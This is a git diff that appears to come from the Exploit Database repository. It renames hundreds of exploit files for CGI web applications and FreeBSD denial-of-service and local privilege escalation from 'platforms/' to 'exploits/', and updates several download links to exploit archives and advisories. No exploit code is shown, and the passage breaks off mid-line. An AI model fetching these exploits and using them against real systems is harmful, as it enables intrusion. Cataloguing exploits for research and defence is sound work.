similarity index 100% rename from platforms/cgi/webapps/38776.txt rename to exploits/cgi/webapps/38776.txt diff --git a/platforms/cgi/webapps/38806.txt b/exploits/cgi/webapps/38806.txt similarity index 100% rename from platforms/cgi/webapps/38806.txt rename to exploits/cgi/webapps/38806.txt diff --git a/platforms/cgi/webapps/38807.txt b/exploits/cgi/webapps/38807.txt similarity index 100% rename from platforms/cgi/webapps/38807.txt rename to exploits/cgi/webapps/38807.txt diff --git a/platforms/cgi/webapps/38882.txt b/exploits/cgi/webapps/38882.txt similarity index 100% rename from platforms/cgi/webapps/38882.txt rename to exploits/cgi/webapps/38882.txt diff --git a/platforms/cgi/webapps/39127.txt b/exploits/cgi/webapps/39127.txt similarity index 100% rename from platforms/cgi/webapps/39127.txt rename to exploits/cgi/webapps/39127.txt diff --git a/platforms/cgi/webapps/39130.txt b/exploits/cgi/webapps/39130.txt similarity index 100% rename from platforms/cgi/webapps/39130.txt rename to exploits/cgi/webapps/39130.txt diff --git a/platforms/cgi/webapps/39131.txt b/exploits/cgi/webapps/39131.txt similarity index 100% rename from platforms/cgi/webapps/39131.txt rename to exploits/cgi/webapps/39131.txt diff --git a/platforms/cgi/webapps/39137.txt b/exploits/cgi/webapps/39137.txt similarity index 100% rename from platforms/cgi/webapps/39137.txt rename to exploits/cgi/webapps/39137.txt diff --git a/platforms/cgi/webapps/39145.txt b/exploits/cgi/webapps/39145.txt similarity index 100% rename from platforms/cgi/webapps/39145.txt rename to exploits/cgi/webapps/39145.txt diff --git a/platforms/cgi/webapps/39156.txt b/exploits/cgi/webapps/39156.txt similarity index 100% rename from platforms/cgi/webapps/39156.txt rename to exploits/cgi/webapps/39156.txt diff --git a/platforms/cgi/webapps/39701.txt b/exploits/cgi/webapps/39701.txt similarity index 100% rename from platforms/cgi/webapps/39701.txt rename to exploits/cgi/webapps/39701.txt diff --git a/platforms/cgi/webapps/39746.txt b/exploits/cgi/webapps/39746.txt similarity index 100% rename from platforms/cgi/webapps/39746.txt rename to exploits/cgi/webapps/39746.txt diff --git a/platforms/cgi/webapps/39762.txt b/exploits/cgi/webapps/39762.txt similarity index 100% rename from platforms/cgi/webapps/39762.txt rename to exploits/cgi/webapps/39762.txt diff --git a/platforms/cgi/webapps/39765.txt b/exploits/cgi/webapps/39765.txt similarity index 100% rename from platforms/cgi/webapps/39765.txt rename to exploits/cgi/webapps/39765.txt diff --git a/platforms/cgi/webapps/39871.txt b/exploits/cgi/webapps/39871.txt similarity index 100% rename from platforms/cgi/webapps/39871.txt rename to exploits/cgi/webapps/39871.txt diff --git a/platforms/cgi/webapps/39887.txt b/exploits/cgi/webapps/39887.txt similarity index 100% rename from platforms/cgi/webapps/39887.txt rename to exploits/cgi/webapps/39887.txt diff --git a/platforms/cgi/webapps/40044.html b/exploits/cgi/webapps/40044.html similarity index 100% rename from platforms/cgi/webapps/40044.html rename to exploits/cgi/webapps/40044.html diff --git a/platforms/cgi/webapps/40063.txt b/exploits/cgi/webapps/40063.txt similarity index 100% rename from platforms/cgi/webapps/40063.txt rename to exploits/cgi/webapps/40063.txt diff --git a/platforms/cgi/webapps/40081.py b/exploits/cgi/webapps/40081.py similarity index 100% rename from platforms/cgi/webapps/40081.py rename to exploits/cgi/webapps/40081.py diff --git a/platforms/cgi/webapps/40112.txt b/exploits/cgi/webapps/40112.txt similarity index 100% rename from platforms/cgi/webapps/40112.txt rename to exploits/cgi/webapps/40112.txt diff --git a/platforms/cgi/webapps/40156.py b/exploits/cgi/webapps/40156.py similarity index 100% rename from platforms/cgi/webapps/40156.py rename to exploits/cgi/webapps/40156.py diff --git a/platforms/cgi/webapps/40157.py b/exploits/cgi/webapps/40157.py similarity index 100% rename from platforms/cgi/webapps/40157.py rename to exploits/cgi/webapps/40157.py diff --git a/platforms/cgi/webapps/40165.txt b/exploits/cgi/webapps/40165.txt similarity index 100% rename from platforms/cgi/webapps/40165.txt rename to exploits/cgi/webapps/40165.txt diff --git a/platforms/cgi/webapps/40166.txt b/exploits/cgi/webapps/40166.txt similarity index 100% rename from platforms/cgi/webapps/40166.txt rename to exploits/cgi/webapps/40166.txt diff --git a/platforms/cgi/webapps/40205.txt b/exploits/cgi/webapps/40205.txt similarity index 100% rename from platforms/cgi/webapps/40205.txt rename to exploits/cgi/webapps/40205.txt diff --git a/platforms/cgi/webapps/40213.txt b/exploits/cgi/webapps/40213.txt similarity index 100% rename from platforms/cgi/webapps/40213.txt rename to exploits/cgi/webapps/40213.txt diff --git a/platforms/cgi/webapps/40254.txt b/exploits/cgi/webapps/40254.txt similarity index 100% rename from platforms/cgi/webapps/40254.txt rename to exploits/cgi/webapps/40254.txt diff --git a/platforms/cgi/webapps/40260.sh b/exploits/cgi/webapps/40260.sh similarity index 100% rename from platforms/cgi/webapps/40260.sh rename to exploits/cgi/webapps/40260.sh diff --git a/platforms/cgi/webapps/40261.txt b/exploits/cgi/webapps/40261.txt similarity index 100% rename from platforms/cgi/webapps/40261.txt rename to exploits/cgi/webapps/40261.txt diff --git a/platforms/cgi/webapps/40262.txt b/exploits/cgi/webapps/40262.txt similarity index 100% rename from platforms/cgi/webapps/40262.txt rename to exploits/cgi/webapps/40262.txt diff --git a/platforms/cgi/webapps/40263.txt b/exploits/cgi/webapps/40263.txt similarity index 100% rename from platforms/cgi/webapps/40263.txt rename to exploits/cgi/webapps/40263.txt diff --git a/platforms/cgi/webapps/40264.txt b/exploits/cgi/webapps/40264.txt similarity index 100% rename from platforms/cgi/webapps/40264.txt rename to exploits/cgi/webapps/40264.txt diff --git a/platforms/cgi/webapps/40265.txt b/exploits/cgi/webapps/40265.txt similarity index 100% rename from platforms/cgi/webapps/40265.txt rename to exploits/cgi/webapps/40265.txt diff --git a/platforms/cgi/webapps/40266.txt b/exploits/cgi/webapps/40266.txt similarity index 100% rename from platforms/cgi/webapps/40266.txt rename to exploits/cgi/webapps/40266.txt diff --git a/platforms/cgi/webapps/40267.txt b/exploits/cgi/webapps/40267.txt similarity index 100% rename from platforms/cgi/webapps/40267.txt rename to exploits/cgi/webapps/40267.txt diff --git a/platforms/cgi/webapps/40269.txt b/exploits/cgi/webapps/40269.txt similarity index 100% rename from platforms/cgi/webapps/40269.txt rename to exploits/cgi/webapps/40269.txt diff --git a/platforms/cgi/webapps/40272.txt b/exploits/cgi/webapps/40272.txt similarity index 85% rename from platforms/cgi/webapps/40272.txt rename to exploits/cgi/webapps/40272.txt index 61281db76..e72cfb0f5 100644 --- a/platforms/cgi/webapps/40272.txt +++ b/exploits/cgi/webapps/40272.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40272.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40272.zip \ No newline at end of file diff --git a/platforms/cgi/webapps/40273.txt b/exploits/cgi/webapps/40273.txt similarity index 85% rename from platforms/cgi/webapps/40273.txt rename to exploits/cgi/webapps/40273.txt index c065b1f33..a910166b5 100644 --- a/platforms/cgi/webapps/40273.txt +++ b/exploits/cgi/webapps/40273.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40273.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40273.zip \ No newline at end of file diff --git a/platforms/cgi/webapps/40274.txt b/exploits/cgi/webapps/40274.txt similarity index 85% rename from platforms/cgi/webapps/40274.txt rename to exploits/cgi/webapps/40274.txt index 0188cbb7d..fae01240b 100644 --- a/platforms/cgi/webapps/40274.txt +++ b/exploits/cgi/webapps/40274.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40274.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40274.zip \ No newline at end of file diff --git a/platforms/cgi/webapps/40277.sh b/exploits/cgi/webapps/40277.sh similarity index 100% rename from platforms/cgi/webapps/40277.sh rename to exploits/cgi/webapps/40277.sh diff --git a/platforms/cgi/webapps/40281.txt b/exploits/cgi/webapps/40281.txt similarity index 100% rename from platforms/cgi/webapps/40281.txt rename to exploits/cgi/webapps/40281.txt diff --git a/platforms/cgi/webapps/40282.txt b/exploits/cgi/webapps/40282.txt similarity index 100% rename from platforms/cgi/webapps/40282.txt rename to exploits/cgi/webapps/40282.txt diff --git a/platforms/cgi/webapps/40283.txt b/exploits/cgi/webapps/40283.txt similarity index 100% rename from platforms/cgi/webapps/40283.txt rename to exploits/cgi/webapps/40283.txt diff --git a/platforms/cgi/webapps/40303.sh b/exploits/cgi/webapps/40303.sh similarity index 100% rename from platforms/cgi/webapps/40303.sh rename to exploits/cgi/webapps/40303.sh diff --git a/platforms/cgi/webapps/40304.txt b/exploits/cgi/webapps/40304.txt similarity index 100% rename from platforms/cgi/webapps/40304.txt rename to exploits/cgi/webapps/40304.txt diff --git a/platforms/cgi/webapps/40367.sh b/exploits/cgi/webapps/40367.sh similarity index 100% rename from platforms/cgi/webapps/40367.sh rename to exploits/cgi/webapps/40367.sh diff --git a/platforms/cgi/webapps/40368.sh b/exploits/cgi/webapps/40368.sh similarity index 100% rename from platforms/cgi/webapps/40368.sh rename to exploits/cgi/webapps/40368.sh diff --git a/platforms/cgi/webapps/40369.sh b/exploits/cgi/webapps/40369.sh similarity index 100% rename from platforms/cgi/webapps/40369.sh rename to exploits/cgi/webapps/40369.sh diff --git a/platforms/cgi/webapps/40370.sh b/exploits/cgi/webapps/40370.sh similarity index 100% rename from platforms/cgi/webapps/40370.sh rename to exploits/cgi/webapps/40370.sh diff --git a/platforms/cgi/webapps/40371.sh b/exploits/cgi/webapps/40371.sh similarity index 100% rename from platforms/cgi/webapps/40371.sh rename to exploits/cgi/webapps/40371.sh diff --git a/platforms/cgi/webapps/40372.sh b/exploits/cgi/webapps/40372.sh similarity index 100% rename from platforms/cgi/webapps/40372.sh rename to exploits/cgi/webapps/40372.sh diff --git a/platforms/cgi/webapps/40373.sh b/exploits/cgi/webapps/40373.sh similarity index 100% rename from platforms/cgi/webapps/40373.sh rename to exploits/cgi/webapps/40373.sh diff --git a/platforms/cgi/webapps/40462.py b/exploits/cgi/webapps/40462.py similarity index 100% rename from platforms/cgi/webapps/40462.py rename to exploits/cgi/webapps/40462.py diff --git a/platforms/cgi/webapps/40463.txt b/exploits/cgi/webapps/40463.txt similarity index 100% rename from platforms/cgi/webapps/40463.txt rename to exploits/cgi/webapps/40463.txt diff --git a/platforms/cgi/webapps/40464.txt b/exploits/cgi/webapps/40464.txt similarity index 100% rename from platforms/cgi/webapps/40464.txt rename to exploits/cgi/webapps/40464.txt diff --git a/platforms/cgi/webapps/40500.py b/exploits/cgi/webapps/40500.py similarity index 100% rename from platforms/cgi/webapps/40500.py rename to exploits/cgi/webapps/40500.py diff --git a/platforms/cgi/webapps/40571.pl b/exploits/cgi/webapps/40571.pl similarity index 100% rename from platforms/cgi/webapps/40571.pl rename to exploits/cgi/webapps/40571.pl diff --git a/platforms/cgi/webapps/407.txt b/exploits/cgi/webapps/407.txt similarity index 100% rename from platforms/cgi/webapps/407.txt rename to exploits/cgi/webapps/407.txt diff --git a/platforms/cgi/webapps/40889.txt b/exploits/cgi/webapps/40889.txt similarity index 100% rename from platforms/cgi/webapps/40889.txt rename to exploits/cgi/webapps/40889.txt diff --git a/platforms/cgi/webapps/41179.txt b/exploits/cgi/webapps/41179.txt similarity index 100% rename from platforms/cgi/webapps/41179.txt rename to exploits/cgi/webapps/41179.txt diff --git a/platforms/cgi/webapps/41578.txt b/exploits/cgi/webapps/41578.txt similarity index 100% rename from platforms/cgi/webapps/41578.txt rename to exploits/cgi/webapps/41578.txt diff --git a/platforms/cgi/webapps/41842.txt b/exploits/cgi/webapps/41842.txt similarity index 100% rename from platforms/cgi/webapps/41842.txt rename to exploits/cgi/webapps/41842.txt diff --git a/platforms/cgi/webapps/42130.txt b/exploits/cgi/webapps/42130.txt similarity index 100% rename from platforms/cgi/webapps/42130.txt rename to exploits/cgi/webapps/42130.txt diff --git a/platforms/cgi/webapps/42342.txt b/exploits/cgi/webapps/42342.txt similarity index 100% rename from platforms/cgi/webapps/42342.txt rename to exploits/cgi/webapps/42342.txt diff --git a/platforms/cgi/webapps/42343.rb b/exploits/cgi/webapps/42343.rb similarity index 100% rename from platforms/cgi/webapps/42343.rb rename to exploits/cgi/webapps/42343.rb diff --git a/platforms/cgi/webapps/42344.rb b/exploits/cgi/webapps/42344.rb similarity index 100% rename from platforms/cgi/webapps/42344.rb rename to exploits/cgi/webapps/42344.rb diff --git a/platforms/cgi/webapps/42345.rb b/exploits/cgi/webapps/42345.rb similarity index 100% rename from platforms/cgi/webapps/42345.rb rename to exploits/cgi/webapps/42345.rb diff --git a/platforms/cgi/webapps/42346.txt b/exploits/cgi/webapps/42346.txt similarity index 100% rename from platforms/cgi/webapps/42346.txt rename to exploits/cgi/webapps/42346.txt diff --git a/platforms/cgi/webapps/4261.txt b/exploits/cgi/webapps/4261.txt similarity index 100% rename from platforms/cgi/webapps/4261.txt rename to exploits/cgi/webapps/4261.txt diff --git a/platforms/cgi/webapps/4264.txt b/exploits/cgi/webapps/4264.txt similarity index 100% rename from platforms/cgi/webapps/4264.txt rename to exploits/cgi/webapps/4264.txt diff --git a/platforms/cgi/webapps/4286.txt b/exploits/cgi/webapps/4286.txt similarity index 100% rename from platforms/cgi/webapps/4286.txt rename to exploits/cgi/webapps/4286.txt diff --git a/platforms/cgi/webapps/42989.txt b/exploits/cgi/webapps/42989.txt similarity index 100% rename from platforms/cgi/webapps/42989.txt rename to exploits/cgi/webapps/42989.txt diff --git a/platforms/cgi/webapps/43013.txt b/exploits/cgi/webapps/43013.txt similarity index 100% rename from platforms/cgi/webapps/43013.txt rename to exploits/cgi/webapps/43013.txt diff --git a/platforms/cgi/webapps/4343.txt b/exploits/cgi/webapps/4343.txt similarity index 100% rename from platforms/cgi/webapps/4343.txt rename to exploits/cgi/webapps/4343.txt diff --git a/platforms/cgi/webapps/4529.txt b/exploits/cgi/webapps/4529.txt similarity index 100% rename from platforms/cgi/webapps/4529.txt rename to exploits/cgi/webapps/4529.txt diff --git a/platforms/cgi/webapps/464.txt b/exploits/cgi/webapps/464.txt similarity index 100% rename from platforms/cgi/webapps/464.txt rename to exploits/cgi/webapps/464.txt diff --git a/platforms/cgi/webapps/4647.txt b/exploits/cgi/webapps/4647.txt similarity index 100% rename from platforms/cgi/webapps/4647.txt rename to exploits/cgi/webapps/4647.txt diff --git a/platforms/cgi/webapps/4977.txt b/exploits/cgi/webapps/4977.txt similarity index 100% rename from platforms/cgi/webapps/4977.txt rename to exploits/cgi/webapps/4977.txt diff --git a/platforms/cgi/webapps/53.c b/exploits/cgi/webapps/53.c similarity index 100% rename from platforms/cgi/webapps/53.c rename to exploits/cgi/webapps/53.c diff --git a/platforms/cgi/webapps/5304.txt b/exploits/cgi/webapps/5304.txt similarity index 100% rename from platforms/cgi/webapps/5304.txt rename to exploits/cgi/webapps/5304.txt diff --git a/platforms/cgi/webapps/5662.txt b/exploits/cgi/webapps/5662.txt similarity index 100% rename from platforms/cgi/webapps/5662.txt rename to exploits/cgi/webapps/5662.txt diff --git a/platforms/cgi/webapps/6108.pl b/exploits/cgi/webapps/6108.pl similarity index 100% rename from platforms/cgi/webapps/6108.pl rename to exploits/cgi/webapps/6108.pl diff --git a/platforms/cgi/webapps/6109.pl b/exploits/cgi/webapps/6109.pl similarity index 100% rename from platforms/cgi/webapps/6109.pl rename to exploits/cgi/webapps/6109.pl diff --git a/platforms/cgi/webapps/6110.pl b/exploits/cgi/webapps/6110.pl similarity index 100% rename from platforms/cgi/webapps/6110.pl rename to exploits/cgi/webapps/6110.pl diff --git a/platforms/cgi/webapps/6111.pl b/exploits/cgi/webapps/6111.pl similarity index 100% rename from platforms/cgi/webapps/6111.pl rename to exploits/cgi/webapps/6111.pl diff --git a/platforms/cgi/webapps/6269.txt b/exploits/cgi/webapps/6269.txt similarity index 100% rename from platforms/cgi/webapps/6269.txt rename to exploits/cgi/webapps/6269.txt diff --git a/platforms/cgi/webapps/642.pl b/exploits/cgi/webapps/642.pl similarity index 100% rename from platforms/cgi/webapps/642.pl rename to exploits/cgi/webapps/642.pl diff --git a/platforms/cgi/webapps/6509.txt b/exploits/cgi/webapps/6509.txt similarity index 100% rename from platforms/cgi/webapps/6509.txt rename to exploits/cgi/webapps/6509.txt diff --git a/platforms/cgi/webapps/659.txt b/exploits/cgi/webapps/659.txt similarity index 100% rename from platforms/cgi/webapps/659.txt rename to exploits/cgi/webapps/659.txt diff --git a/platforms/cgi/webapps/6771.txt b/exploits/cgi/webapps/6771.txt similarity index 100% rename from platforms/cgi/webapps/6771.txt rename to exploits/cgi/webapps/6771.txt diff --git a/platforms/cgi/webapps/6845.txt b/exploits/cgi/webapps/6845.txt similarity index 100% rename from platforms/cgi/webapps/6845.txt rename to exploits/cgi/webapps/6845.txt diff --git a/platforms/cgi/webapps/6864.txt b/exploits/cgi/webapps/6864.txt similarity index 100% rename from platforms/cgi/webapps/6864.txt rename to exploits/cgi/webapps/6864.txt diff --git a/platforms/cgi/webapps/7404.txt b/exploits/cgi/webapps/7404.txt similarity index 100% rename from platforms/cgi/webapps/7404.txt rename to exploits/cgi/webapps/7404.txt diff --git a/platforms/cgi/webapps/772.c b/exploits/cgi/webapps/772.c similarity index 100% rename from platforms/cgi/webapps/772.c rename to exploits/cgi/webapps/772.c diff --git a/platforms/cgi/webapps/773.pl b/exploits/cgi/webapps/773.pl similarity index 100% rename from platforms/cgi/webapps/773.pl rename to exploits/cgi/webapps/773.pl diff --git a/platforms/cgi/webapps/7753.pl b/exploits/cgi/webapps/7753.pl similarity index 100% rename from platforms/cgi/webapps/7753.pl rename to exploits/cgi/webapps/7753.pl diff --git a/platforms/cgi/webapps/790.pl b/exploits/cgi/webapps/790.pl similarity index 100% rename from platforms/cgi/webapps/790.pl rename to exploits/cgi/webapps/790.pl diff --git a/platforms/cgi/webapps/8085.txt b/exploits/cgi/webapps/8085.txt similarity index 100% rename from platforms/cgi/webapps/8085.txt rename to exploits/cgi/webapps/8085.txt diff --git a/platforms/cgi/webapps/8086.txt b/exploits/cgi/webapps/8086.txt similarity index 100% rename from platforms/cgi/webapps/8086.txt rename to exploits/cgi/webapps/8086.txt diff --git a/platforms/cgi/webapps/8087.txt b/exploits/cgi/webapps/8087.txt similarity index 100% rename from platforms/cgi/webapps/8087.txt rename to exploits/cgi/webapps/8087.txt diff --git a/platforms/cgi/webapps/8247.txt b/exploits/cgi/webapps/8247.txt similarity index 100% rename from platforms/cgi/webapps/8247.txt rename to exploits/cgi/webapps/8247.txt diff --git a/platforms/cgi/webapps/840.c b/exploits/cgi/webapps/840.c similarity index 100% rename from platforms/cgi/webapps/840.c rename to exploits/cgi/webapps/840.c diff --git a/platforms/cgi/webapps/853.c b/exploits/cgi/webapps/853.c similarity index 100% rename from platforms/cgi/webapps/853.c rename to exploits/cgi/webapps/853.c diff --git a/platforms/cgi/webapps/862.txt b/exploits/cgi/webapps/862.txt similarity index 100% rename from platforms/cgi/webapps/862.txt rename to exploits/cgi/webapps/862.txt diff --git a/platforms/cgi/webapps/8895.txt b/exploits/cgi/webapps/8895.txt similarity index 100% rename from platforms/cgi/webapps/8895.txt rename to exploits/cgi/webapps/8895.txt diff --git a/platforms/cgi/webapps/8987.txt b/exploits/cgi/webapps/8987.txt similarity index 100% rename from platforms/cgi/webapps/8987.txt rename to exploits/cgi/webapps/8987.txt diff --git a/platforms/cgi/webapps/9074.txt b/exploits/cgi/webapps/9074.txt similarity index 100% rename from platforms/cgi/webapps/9074.txt rename to exploits/cgi/webapps/9074.txt diff --git a/platforms/cgi/webapps/9140.txt b/exploits/cgi/webapps/9140.txt similarity index 100% rename from platforms/cgi/webapps/9140.txt rename to exploits/cgi/webapps/9140.txt diff --git a/platforms/cgi/webapps/922.pl b/exploits/cgi/webapps/922.pl similarity index 100% rename from platforms/cgi/webapps/922.pl rename to exploits/cgi/webapps/922.pl diff --git a/platforms/cgi/webapps/923.pl b/exploits/cgi/webapps/923.pl similarity index 100% rename from platforms/cgi/webapps/923.pl rename to exploits/cgi/webapps/923.pl diff --git a/platforms/cgi/webapps/9357.txt b/exploits/cgi/webapps/9357.txt similarity index 100% rename from platforms/cgi/webapps/9357.txt rename to exploits/cgi/webapps/9357.txt diff --git a/platforms/cgi/webapps/954.pl b/exploits/cgi/webapps/954.pl similarity index 100% rename from platforms/cgi/webapps/954.pl rename to exploits/cgi/webapps/954.pl diff --git a/platforms/cgi/webapps/980.pl b/exploits/cgi/webapps/980.pl similarity index 100% rename from platforms/cgi/webapps/980.pl rename to exploits/cgi/webapps/980.pl diff --git a/platforms/cgi/webapps/9907.rb b/exploits/cgi/webapps/9907.rb similarity index 100% rename from platforms/cgi/webapps/9907.rb rename to exploits/cgi/webapps/9907.rb diff --git a/platforms/cgi/webapps/9909.rb b/exploits/cgi/webapps/9909.rb similarity index 100% rename from platforms/cgi/webapps/9909.rb rename to exploits/cgi/webapps/9909.rb diff --git a/platforms/cgi/webapps/9912.rb b/exploits/cgi/webapps/9912.rb similarity index 100% rename from platforms/cgi/webapps/9912.rb rename to exploits/cgi/webapps/9912.rb diff --git a/platforms/freebsd/dos/12762.txt b/exploits/freebsd/dos/12762.txt similarity index 100% rename from platforms/freebsd/dos/12762.txt rename to exploits/freebsd/dos/12762.txt diff --git a/platforms/freebsd/dos/14003.c b/exploits/freebsd/dos/14003.c similarity index 100% rename from platforms/freebsd/dos/14003.c rename to exploits/freebsd/dos/14003.c diff --git a/platforms/freebsd/dos/17908.sh b/exploits/freebsd/dos/17908.sh similarity index 100% rename from platforms/freebsd/dos/17908.sh rename to exploits/freebsd/dos/17908.sh diff --git a/platforms/freebsd/dos/19130.c b/exploits/freebsd/dos/19130.c similarity index 100% rename from platforms/freebsd/dos/19130.c rename to exploits/freebsd/dos/19130.c diff --git a/platforms/freebsd/dos/19505.c b/exploits/freebsd/dos/19505.c similarity index 100% rename from platforms/freebsd/dos/19505.c rename to exploits/freebsd/dos/19505.c diff --git a/platforms/freebsd/dos/19687.c b/exploits/freebsd/dos/19687.c similarity index 100% rename from platforms/freebsd/dos/19687.c rename to exploits/freebsd/dos/19687.c diff --git a/platforms/freebsd/dos/20226.c b/exploits/freebsd/dos/20226.c similarity index 100% rename from platforms/freebsd/dos/20226.c rename to exploits/freebsd/dos/20226.c diff --git a/platforms/freebsd/dos/21512.txt b/exploits/freebsd/dos/21512.txt similarity index 100% rename from platforms/freebsd/dos/21512.txt rename to exploits/freebsd/dos/21512.txt diff --git a/platforms/freebsd/dos/22831.pl b/exploits/freebsd/dos/22831.pl similarity index 100% rename from platforms/freebsd/dos/22831.pl rename to exploits/freebsd/dos/22831.pl diff --git a/platforms/freebsd/dos/23540.c b/exploits/freebsd/dos/23540.c similarity index 100% rename from platforms/freebsd/dos/23540.c rename to exploits/freebsd/dos/23540.c diff --git a/platforms/freebsd/dos/24233.c b/exploits/freebsd/dos/24233.c similarity index 100% rename from platforms/freebsd/dos/24233.c rename to exploits/freebsd/dos/24233.c diff --git a/platforms/freebsd/dos/24450.txt b/exploits/freebsd/dos/24450.txt similarity index 100% rename from platforms/freebsd/dos/24450.txt rename to exploits/freebsd/dos/24450.txt diff --git a/platforms/freebsd/dos/28648.c b/exploits/freebsd/dos/28648.c similarity index 100% rename from platforms/freebsd/dos/28648.c rename to exploits/freebsd/dos/28648.c diff --git a/platforms/freebsd/dos/28812.c b/exploits/freebsd/dos/28812.c similarity index 100% rename from platforms/freebsd/dos/28812.c rename to exploits/freebsd/dos/28812.c diff --git a/platforms/freebsd/dos/28813.c b/exploits/freebsd/dos/28813.c similarity index 100% rename from platforms/freebsd/dos/28813.c rename to exploits/freebsd/dos/28813.c diff --git a/platforms/freebsd/dos/35938.txt b/exploits/freebsd/dos/35938.txt similarity index 100% rename from platforms/freebsd/dos/35938.txt rename to exploits/freebsd/dos/35938.txt diff --git a/platforms/freebsd/dos/39305.py b/exploits/freebsd/dos/39305.py similarity index 100% rename from platforms/freebsd/dos/39305.py rename to exploits/freebsd/dos/39305.py diff --git a/platforms/freebsd/dos/8259.c b/exploits/freebsd/dos/8259.c similarity index 100% rename from platforms/freebsd/dos/8259.c rename to exploits/freebsd/dos/8259.c diff --git a/platforms/freebsd/dos/9134.c b/exploits/freebsd/dos/9134.c similarity index 100% rename from platforms/freebsd/dos/9134.c rename to exploits/freebsd/dos/9134.c diff --git a/platforms/freebsd/dos/9206.c b/exploits/freebsd/dos/9206.c similarity index 100% rename from platforms/freebsd/dos/9206.c rename to exploits/freebsd/dos/9206.c diff --git a/platforms/freebsd/dos/9373.c b/exploits/freebsd/dos/9373.c similarity index 100% rename from platforms/freebsd/dos/9373.c rename to exploits/freebsd/dos/9373.c diff --git a/platforms/freebsd/local/12090.txt b/exploits/freebsd/local/12090.txt similarity index 90% rename from platforms/freebsd/local/12090.txt rename to exploits/freebsd/local/12090.txt index e7f982ce3..a3648e0f7 100644 --- a/platforms/freebsd/local/12090.txt +++ b/exploits/freebsd/local/12090.txt @@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri improper handling of environment variables. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12090.pdf (cybsec_advisory_2010_0404.pdf) \ No newline at end of file diff --git a/platforms/freebsd/local/12091.txt b/exploits/freebsd/local/12091.txt similarity index 90% rename from platforms/freebsd/local/12091.txt rename to exploits/freebsd/local/12091.txt index d4bf102aa..97a039868 100644 --- a/platforms/freebsd/local/12091.txt +++ b/exploits/freebsd/local/12091.txt @@ -14,4 +14,4 @@ Vulnerability Description: Some files that allow to obtain usernames and other internal information can be read by any user inside the CLI. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12091.pdf (cybsec_advisory_2010_0403.pdf) \ No newline at end of file diff --git a/platforms/freebsd/local/14002.c b/exploits/freebsd/local/14002.c similarity index 100% rename from platforms/freebsd/local/14002.c rename to exploits/freebsd/local/14002.c diff --git a/platforms/freebsd/local/14688.c b/exploits/freebsd/local/14688.c similarity index 100% rename from platforms/freebsd/local/14688.c rename to exploits/freebsd/local/14688.c diff --git a/platforms/freebsd/local/16119.c b/exploits/freebsd/local/16119.c similarity index 100% rename from platforms/freebsd/local/16119.c rename to exploits/freebsd/local/16119.c diff --git a/platforms/freebsd/local/19346.c b/exploits/freebsd/local/19346.c similarity index 100% rename from platforms/freebsd/local/19346.c rename to exploits/freebsd/local/19346.c diff --git a/platforms/freebsd/local/19504.c b/exploits/freebsd/local/19504.c similarity index 100% rename from platforms/freebsd/local/19504.c rename to exploits/freebsd/local/19504.c diff --git a/platforms/freebsd/local/19609.txt b/exploits/freebsd/local/19609.txt similarity index 100% rename from platforms/freebsd/local/19609.txt rename to exploits/freebsd/local/19609.txt diff --git a/platforms/freebsd/local/19649.c b/exploits/freebsd/local/19649.c similarity index 100% rename from platforms/freebsd/local/19649.c rename to exploits/freebsd/local/19649.c diff --git a/platforms/freebsd/local/19650.txt b/exploits/freebsd/local/19650.txt similarity index 100% rename from platforms/freebsd/local/19650.txt rename to exploits/freebsd/local/19650.txt diff --git a/platforms/freebsd/local/19651.txt b/exploits/freebsd/local/19651.txt similarity index 100% rename from platforms/freebsd/local/19651.txt rename to exploits/freebsd/local/19651.txt diff --git a/platforms/freebsd/local/19652.c b/exploits/freebsd/local/19652.c similarity index 100% rename from platforms/freebsd/local/19652.c rename to exploits/freebsd/local/19652.c diff --git a/platforms/freebsd/local/19653.c b/exploits/freebsd/local/19653.c similarity index 100% rename from platforms/freebsd/local/19653.c rename to exploits/freebsd/local/19653.c diff --git a/platforms/freebsd/local/19685.txt b/exploits/freebsd/local/19685.txt similarity index 100% rename from platforms/freebsd/local/19685.txt rename to exploits/freebsd/local/19685.txt diff --git a/platforms/freebsd/local/19756.txt b/exploits/freebsd/local/19756.txt similarity index 100% rename from platforms/freebsd/local/19756.txt rename to exploits/freebsd/local/19756.txt diff --git a/platforms/freebsd/local/20377.c b/exploits/freebsd/local/20377.c similarity index 100% rename from platforms/freebsd/local/20377.c rename to exploits/freebsd/local/20377.c diff --git a/platforms/freebsd/local/21114.txt b/exploits/freebsd/local/21114.txt similarity index 100% rename from platforms/freebsd/local/21114.txt rename to exploits/freebsd/local/21114.txt diff --git a/platforms/freebsd/local/21176.c b/exploits/freebsd/local/21176.c similarity index 100% rename from platforms/freebsd/local/21176.c rename to exploits/freebsd/local/21176.c diff --git a/platforms/freebsd/local/21462.sh b/exploits/freebsd/local/21462.sh similarity index 100% rename from platforms/freebsd/local/21462.sh rename to exploits/freebsd/local/21462.sh diff --git a/platforms/freebsd/local/21798.txt b/exploits/freebsd/local/21798.txt similarity index 100% rename from platforms/freebsd/local/21798.txt rename to exploits/freebsd/local/21798.txt diff --git a/platforms/freebsd/local/21799.txt b/exploits/freebsd/local/21799.txt similarity index 100% rename from platforms/freebsd/local/21799.txt rename to exploits/freebsd/local/21799.txt diff --git a/platforms/freebsd/local/22566.pl b/exploits/freebsd/local/22566.pl similarity index 100% rename from platforms/freebsd/local/22566.pl rename to exploits/freebsd/local/22566.pl diff --git a/platforms/freebsd/local/22573.pl b/exploits/freebsd/local/22573.pl similarity index 100% rename from platforms/freebsd/local/22573.pl rename to exploits/freebsd/local/22573.pl diff --git 